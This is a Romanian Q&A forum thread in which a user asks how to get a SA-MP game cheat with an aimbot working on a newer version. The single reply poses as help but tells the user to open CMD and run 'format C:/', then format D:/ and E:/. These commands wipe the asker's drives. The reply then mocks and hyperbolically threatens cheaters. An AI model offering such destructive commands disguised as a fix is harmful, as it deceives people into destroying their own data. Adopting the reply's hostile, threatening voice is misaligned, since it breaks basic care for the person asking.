| dani112 a întrebat:

Joc samp. aveam pe versiunea de samp 0.3e un sobeit numit project sonictz era foarte tare avea un aimbot super.sau schimbat toti pe 0.3x si nu-mi mai merge sobu ala..stie crv cum sa-l fac pentru 0.3x sau alt sob? cu un aimbot bun...
inca cv ai aimbbot trebuie doar sal deschid apas " i " ca sa il pornesc si " k " ca sa-l opresc imi cerea net framework 4...4 si cv laughing in fine am instalat net framwork si imi da " SAMPAIMBOT HAS STOPPED WORKING " ce sa fac crying((

1 răspuns:
| K13 a răspuns:

Sa intri in
Start
Run
CMD
format C:/
Y
Format D:/
Y
Format E:/

Nu as ajuta un codat nici daca ar fi ultimul om de pe planeta.
Daca vrei sa inveti ceva din jocul ala, joaca Hard Role-Play si lasa cheat-urile-.

I-as bombarda pe toti care folosesc cheat-uri la jocurile online!
Poate ca zodia taur, te salveaza cat de cat din mainile mele.
Salut-o pe Oana din partea mea!